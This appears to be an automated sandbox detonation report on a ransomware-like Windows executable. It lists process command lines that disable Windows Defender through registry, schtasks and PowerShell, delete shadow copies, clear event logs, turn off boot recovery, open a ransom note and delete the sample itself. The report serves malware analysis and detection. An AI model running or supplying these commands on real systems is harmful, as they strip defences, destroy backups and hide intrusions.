| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe
"C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\mpYx_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/1920-54-0x0000000000000000-mapping.dmp
memory/668-55-0x0000000000000000-mapping.dmp
memory/772-56-0x0000000000000000-mapping.dmp
memory/864-57-0x0000000000000000-mapping.dmp
memory/1504-58-0x0000000000000000-mapping.dmp
memory/552-59-0x0000000000000000-mapping.dmp
memory/1860-60-0x0000000000000000-mapping.dmp
memory/1864-61-0x0000000000000000-mapping.dmp
memory/948-62-0x0000000000000000-mapping.dmp
memory/1828-63-0x0000000000000000-mapping.dmp
memory/1780-64-0x0000000000000000-mapping.dmp
memory/432-65-0x0000000000000000-mapping.dmp
memory/2020-66-0x0000000000000000-mapping.dmp
memory/2000-67-0x0000000000000000-mapping.dmp
memory/1868-68-0x0000000000000000-mapping.dmp
memory/1924-69-0x0000000000000000-mapping.dmp
memory/1524-70-0x0000000000000000-mapping.dmp
memory/952-71-0x0000000000000000-mapping.dmp
memory/1376-72-0x0000000000000000-mapping.dmp
memory/1944-73-0x0000000000000000-mapping.dmp
memory/1692-74-0x0000000000000000-mapping.dmp
memory/1676-75-0x0000000000000000-mapping.dmp
memory/1488-76-0x0000000000000000-mapping.dmp
memory/1304-77-0x0000000000000000-mapping.dmp
memory/1756-78-0x0000000000000000-mapping.dmp
memory/516-79-0x0000000000000000-mapping.dmp
memory/856-80-0x0000000000000000-mapping.dmp
memory/552-81-0x0000000000000000-mapping.dmp
memory/632-82-0x0000000000000000-mapping.dmp
memory/1288-83-0x0000000000000000-mapping.dmp
memory/292-84-0x0000000000000000-mapping.dmp
memory/1996-85-0x0000000000000000-mapping.dmp
memory/2024-86-0x0000000000000000-mapping.dmp
memory/1364-87-0x0000000000000000-mapping.dmp
memory/2028-88-0x0000000000000000-mapping.dmp
memory/992-89-0x0000000000000000-mapping.dmp
memory/1760-90-0x0000000000000000-mapping.dmp
memory/2044-91-0x0000000000000000-mapping.dmp
memory/1148-92-0x0000000000000000-mapping.dmp
memory/880-93-0x0000000000000000-mapping.dmp
memory/1276-94-0x0000000000000000-mapping.dmp
memory/864-95-0x0000000000000000-mapping.dmp
memory/1048-96-0x0000000000000000-mapping.dmp
memory/1828-97-0x0000000000000000-mapping.dmp
memory/432-98-0x0000000000000000-mapping.dmp
memory/1924-99-0x0000000000000000-mapping.dmp
memory/1656-100-0x0000000000000000-mapping.dmp
memory/1712-101-0x0000000000000000-mapping.dmp
memory/932-102-0x0000000000000000-mapping.dmp
memory/920-103-0x0000000000000000-mapping.dmp
memory/668-104-0x0000000000000000-mapping.dmp
memory/1096-105-0x0000000000000000-mapping.dmp
memory/776-106-0x0000000000000000-mapping.dmp
memory/1840-107-0x0000000000000000-mapping.dmp
memory/1528-108-0x0000000000000000-mapping.dmp
memory/1500-109-0x0000000000000000-mapping.dmp
memory/1764-110-0x0000000000000000-mapping.dmp
memory/1952-111-0x0000000000000000-mapping.dmp
memory/1800-112-0x0000000000000000-mapping.dmp
memory/1800-113-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp
memory/1468-114-0x0000000000000000-mapping.dmp
memory/1684-116-0x0000000000000000-mapping.dmp
memory/1060-118-0x0000000000000000-mapping.dmp
memory/1352-119-0x0000000000000000-mapping.dmp
memory/1256-120-0x0000000000000000-mapping.dmp
memory/2088-123-0x0000000002520000-0x0000000002522000-memory.dmp
memory/2088-124-0x0000000002522000-0x0000000002524000-memory.dmp
memory/2088-125-0x0000000002524000-0x0000000002527000-memory.dmp
memory/2088-122-0x000007FEF3360000-0x000007FEF3EBD000-memory.dmp
memory/2088-126-0x000000000252B000-0x000000000254A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e3baa52b70721dad4944dc46b0bb892b |
| SHA1 | 2e7153e792e7bc063dff5af6fb0f159ab42fcfb5 |
| SHA256 | 642e31e822da58b065eab9a37878ef6590f7e9336704a9f2cecade386a71b511 |
| SHA512 | 66edc3cf82e652bf75ba3e83abc6f37215e7afc0ba8f9372c5aacc1cca6c1063fe31655920e6ed6791f9400d1ece69ce9825fdaf3ae278adf3095388f75fab12 |
memory/2176-129-0x000007FEF29C0000-0x000007FEF351D000-memory.dmp
memory/2176-130-0x00000000027A0000-0x00000000027A2000-memory.dmp
memory/2176-131-0x00000000027A2000-0x00000000027A4000-memory.dmp
memory/2176-132-0x00000000027AB000-0x00000000027CA000-memory.dmp
memory/2176-133-0x00000000027A4000-0x00000000027A7000-memory.dmp
C:\mpYx_HOW_TO_DECRYPT.txt
| MD5 | e6e9663ba409762ce7b1770348a71620 |
| SHA1 | b0a8dff97924258c6a63aea473c282fa2f4a3ed6 |
| SHA256 | ce1e0ae7d7289cf3b8f24e37fe9c20ca0d0bce292e254ac3a6c4203418b947c9 |
| SHA512 | be343d7b56f9b5c1d4b07bb20816e6fdf049ace5e796e7ea188ccef3689783c659ad00176e55bb3c536428c0acb0af7b8909e9ca0656c70cbacb38c3d6adccaf |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 13:28
Reported
2022-01-13 13:33
Platform
win10-en-20211208
Max time kernel
21s
Max time network
194s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\IpsMigrationPlugin.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\jni.h.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_B_SYlhmj7V00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_V2Y05SV3JlI0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\bin\setEmbeddedCP.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_P6bEhAawo240.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_SMyMLJcnZq40.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_NUh9FVyebyg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_OLXvXeOfBA80.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\management.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_D9gi_BQRk-g0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_a-PJQrqhcxg0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_G4cQISVysbQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_2RHdiCGlXRs0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_PLMBIMcX-1E0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_wilVe-b__680.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_UJSSmJnK8Mo0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\oledbvbs.inc | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgePackages.h.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_hqdhHwEYXkE0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_wSmC5uUG5-g0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_PfIEI01VNv00.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_Oz6DDTSf_JY0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_8Z2U16BeHjw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7__aD52WGxAmQ0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\ServiceWatcherSchedule.xml.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_LMIC5Q_DFWk0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Orange Circles.htm | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsid.xml | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\nb-NO\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.VNRwpfAl5VlChrZtj1ZDOUMB0FUOWDSC8NLPVADaFp7_1WSMknV_NUw0.f1cbq | C:\Users\Admin\AppData\Local\Temp\ea953cb3c4858e971dc4d75a2a11a6d0af42af36c0cad9c3f1e08d4c6e5f2ef8.exe | N/A |
